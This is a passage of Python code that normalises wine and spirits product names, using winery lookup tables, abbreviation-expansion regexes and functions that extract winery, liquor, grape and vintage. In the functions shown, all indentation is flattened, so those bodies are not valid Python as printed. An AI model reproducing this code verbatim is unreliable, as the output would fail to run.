# winery to wine lookup when no grape is found in the wine name
#
# extract the wine name from a winery - when a field does not have a grape lookup for the row
# the name looked up and found will be the name used
noGrapeLookup = {
    'Ehlers' : ['120-80'], # matches an abbreviation - and matches fldWineDescr
'Alban' : ['Pandora'],
'BV' : ['Tapestry', 'Latour'],
'Bennett Ln' : ['Maximus'],
'Bremer' : ['Austintatious'],
'Cain Five' : None,
'Colgin' : ['Cariad', 'IX'],
'Concha Don Melchor' : None,
'Continuum' : None,
'Darioush' : ['Duel', 'Darius'],
'Duckhorn' : ['Discussion'],
'Far Niente' : ['Dolce'],
'Flora' : ['Trilogy'],
'Franciscan' : ['Magnificat'],
'Grgich' : ['Violetta'],
'Gundlach' : ['Vintage Reserve'],
'Justin' : ['Isosceles'],
'Krug' : ['Generations'],
'Mondavi' : ['Maestro'],
'Newton' : ['Puzzle'],
'Opus One' : None,
'Phelps' : ['Insignia'],
'Prisoner' : ['Cuttings', 'Derange', 'Saldo', 'Blindfold'],
'Ridge' : ['Monte Bello'],
'Robert Foley' : ['Griffin'],
'Sullivan' : ['Coeur de Vigne'],
'Zaca' : ['ZThree', 'ZCuvee'],
'zCognac Courvoisier' : ['Napolean', 'VS', 'VSOP', 'XO'],
'zCognac Hennessy' : ['Paradis', 'Richard', 'VS', 'VSOP', 'XO', 'Master'],
'zCognac Remy' : ['1738', 'Louis XIII', 'VSOP', 'XO', 'VS'],
'zRum Ron Zacapa' : ['23', 'Negra', 'XO'],
'zRye Hayden' : ['Dark', 'Caribbean'],
'zScotch Hibiki Harmony' : None,
# 'zScotch Hibiki' : ['Toki', '12', '17', '21', '30'],
'zTeq Campo Azul' : ['Extra Anejo', 'Anejo', 'Blanco', 'Reposado'],
'zTeq Casamigos' : ['Extra Anejo', 'Anejo', 'Blanco', 'Reposado'],
'zTeq Casino Azul' : ['Extra Anejo', 'Anejo', 'Blanco', 'Reposado', 'Silver'],
'zTeq Clase Azul' : ['Ultra', 'Extra Anejo', 'Anejo', 'Blanco', 'Reposado', 'Mezcal', 'Plata', 'Platino'],
'zTeq Dos Artes' : ['Extra Anejo'],
'zTeq Gran Cava' : ['Extra Anejo'],
'zTeq Loma Azul' : ['Extra Anejo', 'Anejo', 'Blanco', 'Reposado'],
# 'zTeq Padre Azul' : ['Extra Anejo', 'Anejo', 'Blanco', 'Reposado'],
'zTeq Partida' : ['Blanco', 'Elegante'],
'zVodka Absolut' : ['Citron', 'Mandarin', 'Mandrin', 'Mango', 'Ruby', 'Vanilia', 'Raspberri', 'Grapevine', None],
'zWhiskey J Walker' : ['Double Black', 'Black', 'Blue', 'Gold', 'Green', 'Platinum', 'Red','Swing', 'White', '18', '21'],
}
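# illustrative use (hypothetical record): a 'Phelps' wine string containing 'Insignia'
# gets wine='Insignia' via wineLookupByName(noGrapeLookup['Phelps'], ...); a value of
# None (e.g. 'Opus One') means no wine name is expected - the winery alone drives the description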
# regex to use to determine if this is a liquor not a wine
#
# winery -> [ liquor, regex ]
# if there is no grape, and no noGrapeLookup found, but the winery has a liquorLookup
# use the list of lookups to find the additional information to add to the winery
#
liquorLookup = {
'zRum Mt Gay' : [
('1703 Mst', re.compile(r'\b1703\b', re.IGNORECASE)),
('BB', re.compile(r'\bBlack Barrel\b', re.IGNORECASE)),
('Eclipse Silver', re.compile(r'\bEclipse\s+Silver\b', re.IGNORECASE)),
('Eclipse', re.compile(r'\bEclipse\b', re.IGNORECASE)),
('Old Peat', re.compile(r'\bOld Peat', re.IGNORECASE)),
('Old Pot', re.compile(r'\bPot\s+Still\b', re.IGNORECASE)),
('Old', re.compile(r'\bOld\b', re.IGNORECASE)),
('Silver', re.compile(r'\bSilver\b', re.IGNORECASE)),
('XO Peat', re.compile(r'\bXO\b', re.IGNORECASE)),
],
'zScotch Glenmorangie' : [
('10', re.compile(r'\b10(YR)?\b', re.IGNORECASE)),
('14 Port', re.compile(r'14.+\bQuinta\b|14.+\bPort\b|\bQuinta\b.+14|\bPort\b.+14', re.IGNORECASE)),
('12 Bacalta', re.compile(r'\bBacalta\b', re.IGNORECASE)),
('12 Burgundy', re.compile(r'\bBurgundy\b', re.IGNORECASE)),
('12 Nectar', re.compile(r'\bNectar\b', re.IGNORECASE)),
('12 Port', re.compile(r'\bQuinta\b|\bPort\b', re.IGNORECASE)),
('12 Sherry', re.compile(r'\bLa\s?Santa\b|\bSherry\b', re.IGNORECASE)),
('12 Signet', re.compile(r'\bSignet\b', re.IGNORECASE)),
('15 Cadboll', re.compile(r'\bCadboll', re.IGNORECASE)),
('15', re.compile(r'\b15(YR)?\b', re.IGNORECASE)),
('18', re.compile(r'\b18(YR)?\b|\b18YEAR\b', re.IGNORECASE)),
('25 Astar', re.compile(r'\bAstar\b', re.IGNORECASE)),
('25', re.compile(r'\b25(YR)?\b', re.IGNORECASE)),
('Companta', re.compile(r'\bCompanta\b', re.IGNORECASE)),
('Finealta', re.compile(r'\bFinealta\b', re.IGNORECASE)),
('Milsean', re.compile(r'\bMilsean\b', re.IGNORECASE)),
('Sonnalta', re.compile(r'\bSonnalta\b', re.IGNORECASE)),
],
'zScotch Macallan' : [
('10 Fine', re.compile(r'\bFine.*\b10\b|\b10.*Fine')),
('10', re.compile(r'\b10\b')),
('12 Double Gold', re.compile(r'\bDbl\b.*Gold|\bDouble\b.*Gold', re.IGNORECASE)),
('12 Double', re.compile(r'\bDouble\s.*12(YR)?\b', re.IGNORECASE)),
('12 Double', re.compile(r'\b12\s.*Double\b', re.IGNORECASE)),
('12 Double', re.compile(r'\bDbl\b|\bDouble\b', re.IGNORECASE)),
('12 Edition 1', re.compile(r'\bEdition\s.*1\b', re.IGNORECASE)),
('12 Edition 2', re.compile(r'\bEdition\s.*2\b', re.IGNORECASE)),
('12 Edition 3', re.compile(r'\bEdition\s.*3\b', re.IGNORECASE)),
('12 Edition 4', re.compile(r'\bEdition\s.*4\b', re.IGNORECASE)),
('12 Sherry', re.compile(r'\b12\s.*Sherry\b|\bSherry\b\s.*\b12', re.IGNORECASE)),
('12 Triple', re.compile(r'\b12(YR)?\s.*Triple\b', re.IGNORECASE)),
('12 Triple', re.compile(r'\bTriple\s.*12\b', re.IGNORECASE)),
('12', re.compile(r'\b12(YR)?\b', re.IGNORECASE)),
('15 Triple', re.compile(r'\b15(YR)?\s.*Triple\b|Triple.+\b15(YR)?\b', re.IGNORECASE)),
('15 Fine', re.compile(r'\b15(YR)?\b.*\bFine\b', re.IGNORECASE)),
('15', re.compile(r'\b15(YR)?\b', re.IGNORECASE)),
('17 Sherry', re.compile(r'\b17(YR)?\s.*Sherry\b', re.IGNORECASE)),
('17 Fine', re.compile(r'\b17(YR)?\b.*\bFine\b', re.IGNORECASE)),
('17', re.compile(r'\b17(YR)?\b', re.IGNORECASE)),
('18 Sherry', re.compile(r'\b18(YR)?\s.*Sherry\b|Sherry\b.*18', re.IGNORECASE)),
('18 Triple', re.compile(r'\b18(YR)?\s.*Triple\b|Triple.+\b18(YR)?\b', re.IGNORECASE)),
('18 Fine', re.compile(r'\b18(YR)?\b.*\bFine\b', re.IGNORECASE)),
('18 Gran', re.compile(r'Gran\b.*\b18', re.IGNORECASE)),
('18', re.compile(r'\b18(YR)?\b', re.IGNORECASE)),
('21 Fine', re.compile(r'\b21.*Fine\b', re.IGNORECASE)),
('21', re.compile(r'\b21(YR)?\b', re.IGNORECASE)),
('25 Sherry', re.compile(r'\b25\s.*Sherry\b', re.IGNORECASE)),
('25', re.compile(r'\b25(YR)?\b')),
('30 Sherry', re.compile(r'\b30\s.*Sherry', re.IGNORECASE)),
('30 Triple', re.compile(r'\b30(YR)?\s.*Triple\b|Triple.+\b30(YR)?\b', re.IGNORECASE)),
('30 Fine', re.compile(r'\b30(YR)?\b.*\bFine\b|Fine.*30', re.IGNORECASE)),
('30', re.compile(r'\b30(YR)?\b')),
('Rare', re.compile(r'\bRare\b', re.IGNORECASE)),
],
'zTeq Cuervo' : [
('Especial Gold', re.compile(r'\bEspecial\b.*Gold\b|Gold.*Especial', re.IGNORECASE)),
('Especial Blue', re.compile(r'\bEspecial\b.*Blue\b', re.IGNORECASE)),
('Especial', re.compile(r'\bEspecial\b', re.IGNORECASE)),
('Familia Platino', re.compile(r'\bPlatino\b', re.IGNORECASE)),
('Familia Anejo', re.compile(r'\bFamilia\b|\bReserva\b', re.IGNORECASE)),
('Gold', re.compile(r'\bGold\b', re.IGNORECASE)),
('Reposado Lagavulin', re.compile(r'\bReposado.*Lagavulin', re.IGNORECASE)),
('Tradicional Anejo', re.compile(r'Tradicional.*Anejo|Anejo.*Tradicional', re.IGNORECASE)),
('Tradicional Reposado', re.compile(r'Tradicional.*Reposado|Reposado.*Tradicional', re.IGNORECASE)),
('Tradicional Silver', re.compile(r'\bTradicional\b', re.IGNORECASE)),
('Tradicional Silver', re.compile(r'\bTraditional\b', re.IGNORECASE)),
('Reposado', re.compile(r'\bReposado\b', re.IGNORECASE)),
('Silver', re.compile(r'\bSilver\b', re.IGNORECASE)),
],
'zTeq Don Julio' : [
('1942', re.compile(r'\b1942\b', re.IGNORECASE)),
('Real', re.compile(r'\bReal\b', re.IGNORECASE)),
('Anejo Claro 70th', re.compile(r'\b70th\b', re.IGNORECASE)),
('Anejo Claro', re.compile(r'\bAnejo\b\s*Claro\b', re.IGNORECASE)),
('Anejo', re.compile(r'\bAnejo\b', re.IGNORECASE)),
('Blanco', re.compile(r'\bBlanco\b', re.IGNORECASE)),
('Reposado Lagavulin', re.compile(r'\bRepo.+Lagvulin\b', re.IGNORECASE)),
('Reposado Dbl', re.compile(r'\bReposado.+Double\b', re.IGNORECASE)),
('Reposado Dbl', re.compile(r'\bReposado.+Dbl\b', re.IGNORECASE)),
('Reposado Dbl', re.compile(r'\bDouble.+Reposado\b', re.IGNORECASE)),
('Reposado Private', re.compile(r'\bReposado.+Private\b', re.IGNORECASE)),
('Reposado', re.compile(r'\bReposado\b', re.IGNORECASE)),
('Silver', re.compile(r'\bSilver\b', re.IGNORECASE)),
],
'zTeq Herradura' : [
('Ultra', re.compile(r'\bUltra\b', re.IGNORECASE)),
('Suprema', re.compile(r'\bSuprema\b', re.IGNORECASE)),
('Anejo', re.compile(r'\bAnejo\b', re.IGNORECASE)),
('Blanco', re.compile(r'\bBlanco\b', re.IGNORECASE)),
('Reposado Gold', re.compile(r'\bReposado\s+Gold\b|\bGold\s+Reposado\b', re.IGNORECASE)),
('Reposado Scotch', re.compile(r'\bReposado.+Scotch\b|\bScotch.+Reposado\b', re.IGNORECASE)),
('Reposado Port', re.compile(r'\bPort.+Reposado\b|\bReposado.+Port\b', re.IGNORECASE)),
('Reposado', re.compile(r'\bReposado\b', re.IGNORECASE)),
('Silver', re.compile(r'\bSilver\b', re.IGNORECASE)),
],
'zTeq Patron' : [
('Gran Piedra', re.compile(r'\bPiedra\b', re.IGNORECASE)),
('DELETE Roca DELETE', re.compile(r'\bRoca\b', re.IGNORECASE)),
('Anejo Extra Lalique', re.compile(r'\bLalique\b', re.IGNORECASE)),
('Anejo Extra 7yr', re.compile(r'\b7YR\b|\b7 anos\b|\b7 year\b', re.IGNORECASE)),
('Anejo Extra 5yr', re.compile(r'\b5YR\b|\b5 anos\b|\b5 year\b', re.IGNORECASE)),
('Anejo Extra 10yr', re.compile(r'\b10\b.+\bExtra\b|\bExtra\b.+10', re.IGNORECASE)),
('Anejo Extra', re.compile(r'\bExtra\s+Anejo\b', re.IGNORECASE)),
('Gran Anejo', re.compile(r'\bGran\s+Anejo\b', re.IGNORECASE)),
('Gran Anejo', re.compile(r'\bBurdeos\b', re.IGNORECASE)),
('Gran Smoky', re.compile(r'\bGran\s+.*Smoky\b', re.IGNORECASE)),
('Anejo', re.compile(r'\bAnejo\b', re.IGNORECASE)),
('Gran Platinum', re.compile(r'\bPlatinum\b', re.IGNORECASE)),
('Reposado', re.compile(r'\bReposado\b', re.IGNORECASE)),
('Silver LTD', re.compile(r'\bSilver.*Limited\b|\bLimited.*Silver\b', re.IGNORECASE)),
('Silver Estate', re.compile(r'\bEstate.*Silver\b|\bSilver.*Estate\b', re.IGNORECASE)),
('Silver', re.compile(r'\bSilver\b', re.IGNORECASE)),
('Blanco', re.compile(r'\bBlanco\b', re.IGNORECASE)),
# ('', re.compile(r'\b\b', re.IGNORECASE)),
],
'zTeq Padre Azul' : [
('Blanco', re.compile(r'\bsilver\b', re.IGNORECASE)),
],
'zWhiskey Balvenie' : [
('12 Double', re.compile(r'\bDouble.*12(YR)?\b', re.IGNORECASE)),
('12 Double', re.compile(r'\b12(YR)?\s.*Double', re.IGNORECASE)),
('12 First', re.compile(r'\b12(YR)?\s.*First', re.IGNORECASE)),
('12 USA', re.compile(r'\b12.*American|American.*12', re.IGNORECASE)),
('12 Toast', re.compile(r'\b12(YR)?\s.*Toast', re.IGNORECASE)),
('12', re.compile(r'\b12(YR)?\b', re.IGNORECASE)),
('14 Carib', re.compile(r'\b14(YR)?\s.*Carib', re.IGNORECASE)),
('14 Carib', re.compile(r'\b14(YR)?\s.*CB\s+Cask', re.IGNORECASE)),
('14 Carib', re.compile(r'\bCarr?ib', re.IGNORECASE)),
('14 Peat', re.compile(r'\b14(YR)?\s.*Peat', re.IGNORECASE)),
('15 Sherry', re.compile(r'\b15(YR)?\s.*Sherry\b', re.IGNORECASE)),
('15 Sherry', re.compile(r'\bSherry\s+.*15(YR)?\b', re.IGNORECASE)),
('15', re.compile(r'\b15(YR)?\b', re.IGNORECASE)),
('16 Triple', re.compile(r'\b16(YR)?\s.*Triple\b', re.IGNORECASE)),
('17 Sherry Double', re.compile(r'\b17(YR)?\s.*Sherry\s+Doub', re.IGNORECASE)),
('17 Sherry', re.compile(r'\b17(YR)?\s.*Sherry', re.IGNORECASE)),
('17 Double', re.compile(r'\b17(YR)?\s.*Double', re.IGNORECASE)),
('17 Double', re.compile(r'\bDouble.*17(YR)?\b', re.IGNORECASE)),
# 17 Double Sherry
# 17 Islay
# 17 New Oak
('17 Peat', re.compile(r'\b17(YR)?\s.*Peat', re.IGNORECASE)),
('17 Peat', re.compile(r'\bPeat.*17(YR)?\b', re.IGNORECASE)),
('17', re.compile(r'\b17(YR)?\b', re.IGNORECASE)),
('21 Port', re.compile(r'\b21.*Port', re.IGNORECASE)),
('21 Port', re.compile(r'\bPort.*21\b', re.IGNORECASE)),
('21', re.compile(r'21', re.IGNORECASE)),
('25', re.compile(r'\b25(YR)?\b', re.IGNORECASE)),
('30', re.compile(r'\b30(YR)?\b', re.IGNORECASE)),
('40', re.compile(r'\b40(YR)?\b', re.IGNORECASE)),
],
'zBourbon Woodford Res' : [
('Dbl', re.compile(r'\bDouble\b', re.IGNORECASE)),
('Derby', re.compile(r'\bDerby\b', re.IGNORECASE)),
('Rye Choc', re.compile(r'\bChocolate.*Rye\b', re.IGNORECASE)),
('Rye', re.compile(r'\bRye\b', re.IGNORECASE)),
('Brandy', re.compile(r'\bBrandy\b', re.IGNORECASE)),
('Batch', re.compile(r'\bBatch\b', re.IGNORECASE)),
('Barrel', re.compile(r'\bBarrel\b', re.IGNORECASE)),
('Master', re.compile(r'\bMasters?\b', re.IGNORECASE)),
('Malt', re.compile(r'\bMalt\b', re.IGNORECASE)),
('Maple', re.compile(r'\bMaple\b', re.IGNORECASE)),
('Wheat', re.compile(r'\bWheat\b', re.IGNORECASE)),
('', re.compile(r'\bWoodford\b', re.IGNORECASE)),
],
'zSambuca' : [
('Romana Black', re.compile(r'\bRomana.*\bBlack\b|\bBlack\s+Romana\b', re.IGNORECASE)),
('Romana', re.compile(r'\bRomana\b', re.IGNORECASE)),
('Di Amore', re.compile(r'\bdi Amore\b', re.IGNORECASE)),
],
'zScotch Hibiki' : [
('12', re.compile(r'\b12\s*YE?A?R\b', re.IGNORECASE)),
('17 Limited', re.compile(r'\b17\s*YE?A?R\b.+Limited', re.IGNORECASE)),
('17', re.compile(r'\b17\s*YE?A?R\b', re.IGNORECASE)),
('21 Limited', re.compile(r'\b21\s*YE?A?R\b.+Limited', re.IGNORECASE)),
('21', re.compile(r'\b21\s*YE?A?R\b', re.IGNORECASE)),
('30', re.compile(r'\b30\s*YE?A?R\b', re.IGNORECASE)),
]
}
# regex to expand abbreviated optional values so they can be matched against the wine fld
wineAbbrLookup = {
'120-80' : r'\bOne\s+Twenty\s+Over\s+Eighty\b',
'3Amigos' : r'\bThree\s+Amigos\b',
'3Palms' : r'\bThree\s+Palms\b',
'3Sister' : r'\bThree\s+Sisters?\b',
'4Barrell' : r'\b4[\-\s]Barrels?\b',
'Alex' : r'\bAlexander\b',
'And' : r'\bAnderson\b',
'Car' : r'\bCarneros\b',
'Carries' : r'\bCarrie',
'CC' : r'\bC\.?C\.?\s+Ranch\b',
'Clone4' : r'\bClone\s+4\b',
'Clone6' : r'\bClone\s+6\b',
'Crossbarn' : r'\bCross\s+Barn\b',
'Donna' : r'\bDonna',
'Est' : r'\bEstate\b',
'Estate' : r'\bEst\b',
'Gap' : r'\bGap|\s%27Gap',
'Gary' : r'\bGary',
'Julia' : r'\bJulia',
'Knights' : r'\bKnight',
'KistlerVnyd' : r'\bKistler (Vineyard|VYD|EST)\b',
'LP' : r'\bLes Pierres\b',
'Lyn' : r'\bLyndenhur?st\b',
'Mont' : r'\bMonterey\b',
'Mt' : r'\bMount\b|\bMt\.\b',
'Napa/Son' : r'\bNapa.*Son',
'Oak' : r'\bOakville\b',
'One-Pt-5' : r'\bOne\s+Point\s+Five\b',
'Pomm' : r'\bPommeraie\b',
'Priv' : r'\bPrivate\b',
'RR' : r'\bRussian\s+Rivers?\b|RRV',
'RRR' : r'\bRussian\s+Rivers?\b|RRV',
'Res' : r'\bReserve\b|\bRsv\b|\bResrv\b|\bReserv\b|\bReserve$',
'Rose' : r'\bRosé|\bROS&EACUTE;|\bRos%E9',
'Ruth' : r'\bRutherford\b',
'Sandy' : r'\bSandy',
'Samanthas' : r'\bSamantha',
'SC' : r'\bSanta\s+Cruz\b',
'SLD' : r'\bStag.*Leap\b',
'SLH' : r'\bSanta\s+Lucia\b',
'SMV' : r'\bSanta\s+Maria|\bS\s+Maria',
'SRH' : r'\bSTA\.?|\bSANTA\s+Rita\b|\bSTA\sRITA\sHILLS|\bS\s+RITA\b',
'SS' : r'\bSpecial\s+Selection\b',
'Stage' : r'\bStagecoach\b',
'Son' : r'\bSonoma\b',
'SYV' : r'\bSanta\s+Ynez\s+Valley\b',
'TD9' : r'\bTD\s+9\b|\bTD-9\b',
'Terraces' : r'\bTerrace',
'TheCutrer' : r'\bThe Cutrer\b|nnay Cutrer\b',
'Tok' : r'\bTo[\s\-]?Kolan|\bTo[\s\-]?Kalon',
'Turn4' : r'\bTurn\s+4\b',
'Vernas' : r'\bVerna',
'Vine' : r'\bVines\b',
'Yount' : r'\bYountville\b',
'ZThree' : r'\bZ.*\bThree\b',
'ZCuvee' : r'\bZ.*\bCuvee\b|\bCuvee Z\b',
# misspellings
'Agustina' : r'\bAugustina\b',
'Durell' : r'\bDurrell\b',
'Benchland' : r'\bBenchlands\b',
'Pritchard' : r'\bPitchard\b',
}
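# Usage sketch (hedged): keys are the short tokens that appear in winedescr,
# and each regex expands the token against the fuller store wine string, e.g.
#   re.search(wineAbbrLookup['RR'], 'Rochioli Russian River Pinot', re.IGNORECASE)   # match
#   re.search(wineAbbrLookup['Res'], 'Caymus Rsv Cab', re.IGNORECASE)                # match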
# regex to detect '(ships as ...)' text - bottle-size matches inside shipping notes are ignored
reShipsAs = re.compile(r'\(ships?\s', re.IGNORECASE)
# the order in which we pull multiple single match attributes
defaultorderlist=[['Tok'], ['Oak'], ['Res'], ['RR'], ['Landslide'], ['Yount'], ['RRR'], ['Son'], ['Ruth'], ['Napa'], ['Helena'], ['SRH'], ['SLH'], ['SMV'], ['SLD'], ['Paso'], ['Alex'], ['Single'], ['Estate']]
### FUNCTIONS ############################################
#########################################################################################
def globalVariableCheck( debug=False ):
# check for liquor definitions that are in noGrapeLookup
# these will never execute
for liquor in liquorLookup:
if liquor in noGrapeLookup:
print('WARNING:liquorLookup regexs will never execute - they are in noGrapeLookup:', liquor)
if liquor in ignoreGrapeLookup:
print('WARNING:liquorLookup regexs will never execute - they are in ignoreGrapeLookup:', liquor)
for winery in ignoreGrapeLookup:
if winery in noGrapeLookup:
print('WARNING:ignoreGrapeLookup regexs will never execute - they are in noGrapeLookup:', winery)
#########################################################################################
def setOptionDictMasterFldValues( optiondict, debug=False ):
# default these fields to the fld values if they are not set
# otherwise leave them alone
for fld in ('fldWine', 'fldWineDescr'):
if not optiondict[fld+'Master']:
optiondict[fld+'Master'] = optiondict[fld]
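# Usage sketch (hypothetical optiondict): master fields default to the
# update-file field names when they are not explicitly set
#   optiondict = {'fldWine': 'wine', 'fldWineMaster': None,
#                 'fldWineDescr': 'winedescr', 'fldWineDescrMaster': None}
#   setOptionDictMasterFldValues(optiondict)
#   # -> fldWineMaster == 'wine', fldWineDescrMaster == 'winedescr'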
#########################################################################################
# having a list of names to look at and match on - see if this record has a match
# nameLookup - list of names could have 'None' as the last value, or just the value of None
# lookupStr - string to be searched
# other - array of strings that will have the matching name removed from
# msg - string defining who called this function
#
# returns: string - if a matching string is found
# None - did not find a match
# '' - valid match with "None"
#
def wineLookupByName( nameLookup, lookupStr, other, msg, wineAbbrLookup=None, debug=False ):
# string for debugging messages
funcname = 'wineLookupByName:' + msg + ':'
# debugging
if debug: print(funcname + 'nameLookup:', nameLookup)
# if the value for this winery is None - then there is no additional work, we are done
if nameLookup is None:
# no additional processing
# debugging
if debug: print(funcname + 'match: value is none - continue on')
# return empty string
return ''
# there are additional lookups for this winery - not using grape as part of the description
# check each of the things to look up
for name in nameLookup:
# debugging
if debug: print(funcname + 'match-name:', name)
# special processing of a lookup value of none
if name is None:
# Lookup on none - means just use what we found
# debugging
if debug: print(funcname + 'name-matched: value is none - continue on:pass back blank')
# stop iterating on nameLookup - by returning empty string
return ''
# we have not encountered 'None' - so build the regex based on the text provided
reName = re.compile( r'\b'+name+r'\b', re.IGNORECASE)
# check to see if we have a match with this regex
if reName.search(lookupStr):
# we have a match - so this is the additional attribute we are looking for
# debugging
if debug: print(funcname+'name-MATCHED:', name)
# remove from other if it is in there
for val in other:
if reName.search(val):
other.remove(val)
# debugging
if debug: print(funcname + 'name-remove-from-other:', val)
# stop iterating on nameLookup - return what we found
return name
# 2nd check - see if this name has a translation in the abbreviation lookup
if wineAbbrLookup and name in wineAbbrLookup:
# build the regex with the look up value
reName = re.compile(wineAbbrLookup[name], re.IGNORECASE)
# debugging
if debug: print(funcname + 'Abbr-match-name:', name)
# check to see if we have a match with this regex
if reName.search(lookupStr):
# we have a match - so this is the additional attribute we are looking for
# debugging
if debug: print(funcname+'Abbr-name-MATCHED:', wineAbbrLookup[name])
# remove from other if it is in there
for val in other:
if reName.search(val):
other.remove(val)
# debugging
if debug: print(funcname + 'name-remove-from-other:', val)
# stop iterating on nameLookup - return what we found
return name
# checked all the nameLookup entries - and did not find any matches
# debugging
if debug: print(funcname + 'name match not found:set to blank')
# return none meaning we did not find a match
return None
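# Usage sketch (hypothetical data) covering the three return cases:
#   wineLookupByName(None, 'anything', [], 'demo')                      # -> ''  (winery maps to None)
#   wineLookupByName(['Insignia'], 'Phelps Insignia Napa', [], 'demo')  # -> 'Insignia'
#   wineLookupByName(['Insignia'], 'Phelps Quartet Napa', [], 'demo')   # -> None (no match)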
#########################################################################################
# find the qualifer like gift, etch, glass tied to this string
#
#
#
# returns: first qualifier or None
#
def findQualifier( wine, debug=False ):
for (val, reSearch) in reQualLookup:
if reSearch.search(wine):
if debug: print('findQualifier:matched-returning:', val)
return val
if debug: print('findQualifier:no-match-returning:', None)
return None
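# Usage sketch (hedged - reQualLookup is defined earlier in this file; assume
# it contains an entry like ('gift', re.compile(r'\bgift\b', re.IGNORECASE))):
#   findQualifier('Caymus Cab 750ml gift box')   # -> 'gift'
#   findQualifier('Caymus Cab 750ml')            # -> None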
#########################################################################################
# find the winery tied to the rec
#
# Global Variable Used: wineryLookup (an array of regex that define the winery)
#
# returns: (winery, reWinery)
#
def findWinery( rec, lastWinery, lastReWinery, fldWine, debug=False ):
# if we had a prior winery - test for this match first
if lastWinery:
# debugging
if debug:
try:
print('fw:new winery:', rec[fldWine])
except Exception as e:
print('debug error8-continuing:', str(e))
print('rec[fldWine]:type:', type(rec[fldWine]))
# print('fw:new winery:', rec[fldWine].decode('windows-1252'))
print('fw:checking if this is lastWinery:', lastWinery)
# check to see if the winery is a match again for this record
if lastReWinery.search(rec[fldWine]):
# debugging
if debug: print('fw:this matches the last winery')
# match again - return values
return(lastWinery, lastReWinery)
else:
# not match - debugging
if debug: print('fw:not last winery')
# if we did not match lastWinery - lets look through the list
# go through the list of wineries (global variable),
# each row contains wineryName, wineryRegex
# pulling out the tuple from the lookup
for (winery, reWinery) in wineryLookup:
# debugging
if debug: print('fw:not lastWinery-checking winery:', winery)
if fldWine not in rec:
print('not a column in this record fldWine:', fldWine)
print('rec:', rec)
# check to see if this winery is a match
if reWinery.search(rec[fldWine]):
# debugging
if debug: print('fw:winery match found:', winery)
# this is a match - set the variables
return (winery, reWinery)
# for loop ends without a match
# did not find a matching winery in the for loop - clear values
return (None, None)
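# Usage sketch (hedged - wineryLookup is defined earlier in this file; assume
# it contains ('Phelps', re.compile(r'\bPhelps\b', re.IGNORECASE))):
#   rec = {'wine': 'Phelps Insignia Napa 2014'}
#   findWinery(rec, None, None, 'wine')          # -> ('Phelps', <compiled regex>)
# passing the returned pair back in as lastWinery/lastReWinery short-circuits
# the full list scan for runs of records from the same winery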
#########################################################################################
# find the liquor tied to the rec, leveraging the winery
# Global Variable Used: liquorLookup
#
# returns: (liquor, reLiquor)
#
def findLiquor( rec, winery, fldWine, debug=False ):
# go through the list of liquors (global variable), pulling out the tuple from the lookup
for (liquor, reLiquor) in liquorLookup[winery]:
# debugging
if debug: print('fl:checking liquor:', liquor)
# check to see if this liquor is a match
if reLiquor.search(rec[fldWine]):
# debugging
if debug: print('fl:liquor match found:', liquor)
# this is a match - set the variables
return (liquor, reLiquor)
# for loop ends without a match
# did not find a matching liquor in the for loop - clear values
return (None, None)
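# Usage sketch using the liquorLookup table above - first match wins, so the
# more specific patterns are listed before the generic ones (e.g. 'Anejo Claro'
# before 'Anejo'):
#   rec = {'wine': 'Don Julio 1942 Anejo 750ml'}
#   findLiquor(rec, 'zTeq Don Julio', 'wine')    # -> ('1942', <compiled regex>)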
#########################################################################################
# find the grape tied to the rec by regex evaluation
#
# Global Variable Used: grapeLookup
#
# returns: (grape, reGrape)
#
def findGrapeByRegex( rec, fldWine, debug=False ):
# go through the list of liquors (global variable), pulling out the tuple from the lookup
for (grape, reGrape) in grapeLookup:
# debugging
if debug: print('fgbr:grape:', grape)
# check to see if this liquor is a match
if grape is not None and reGrape.search(rec[fldWine]):
# debugging
if debug: print('fgbr:grape match found:', grape)
# this is a match - set the variables
return (grape, reGrape)
# for loop ends without a match
# did not find a matching grape in the for loop - clear values
return (None, None)
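# Usage sketch (hedged - grapeLookup is defined earlier in this file; assume
# it contains ('Cab', re.compile(r'\bCab\b', re.IGNORECASE))):
#   findGrapeByRegex({'wine': 'Caymus Cab Napa 2014'}, 'wine')   # -> ('Cab', <regex>)
#   findGrapeByRegex({'wine': 'Mt Gay Eclipse Rum'}, 'wine')     # -> (None, None)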
#########################################################################################
# find a string in a field of a record using string match and
# on match, return that it matched and the remainder of the string as an array
#
# returns: (findStr, other)
#
def findStrInRecReturnOther( rec, fldWineDescr, findStr, debug=False ):
# find where in the string this findStr is positioned
matchLoc = rec[fldWineDescr].find(findStr)
# if we found a location
if matchLoc > -1:
# then strip everything to the left of the findStr value and then split this to create other attributes
other = rec[fldWineDescr][matchLoc+len(findStr)+1:].split()
# debugging
if debug: print('fsirro:findStr matched:', findStr)
if debug: print('fsirro:findStr other:', other)
# return what we found
return (findStr, other)
#no match found - debugging
if debug: print('fsirro:findStr did not match using:', findStr)
# did not find a matching findStr - return that fact
return (None, [])
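# Usage sketch (hypothetical record) - everything right of the matched string
# is split into the other list:
#   rec = {'winedescr': 'Caymus Cab Napa 2014'}
#   findStrInRecReturnOther(rec, 'winedescr', 'Cab')    # -> ('Cab', ['Napa', '2014'])
#   findStrInRecReturnOther(rec, 'winedescr', 'Pinot')  # -> (None, [])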
#########################################################################################
# find the grape tied to the rec and the list of other attributes
# to the right of the grape in that description
#
# Global Variable Used: grapeLookup
#
# returns: (grape, other)
#
def findGrapeByStr( rec, fldWineDescr, debug=False ):
# find the grape and strip everything right of that from the fldWineDescr field
for (grape,reGrape) in grapeLookup:
# debugging
if debug: print('fg:grape:', grape)
# find where in the string this grape is positioned
(grape, other) = findStrInRecReturnOther( rec, fldWineDescr, grape, debug=debug)
# if we have a match return that match
if grape:
return (grape, other)
# did not find a matching grape - return that fact
return (None, [])
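# Usage sketch (hedged - assumes 'Cab' is an entry in the global grapeLookup):
#   findGrapeByStr({'winedescr': 'Caymus Cab Napa 2014'}, 'winedescr')
#   # -> ('Cab', ['Napa', '2014']) - plain string match on fldWineDescr, not regex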
#########################################################################################
# find the vintage tied to the rec
#
# Global Variable Used: vintageLookup
#
# returns: vintage
#
def findVintage( rec, fldWine, debug=False ):
# loop through the vintage lookup records
for reVintage in vintageLookup:
# search for match
m = reVintage.search(rec[fldWine])
# if there is a match
if m:
# extract the value from the first regex group with a value
if m.group(1):
vintage = m.group(1)
if debug: print('fv:vintage-match:', reVintage,':group1')
elif m.group(2):
vintage = m.group(2)
if debug: print('fv:vintage-match:', reVintage,':group2')
elif m.group(3):
vintage = m.group(3)
if debug: print('fv:vintage-match:', reVintage,':group3')
else:
vintage = m.group(4)
if debug: print('fv:vintage-match:', reVintage,':group4')
# return what we found
return vintage
# did not find it
return None
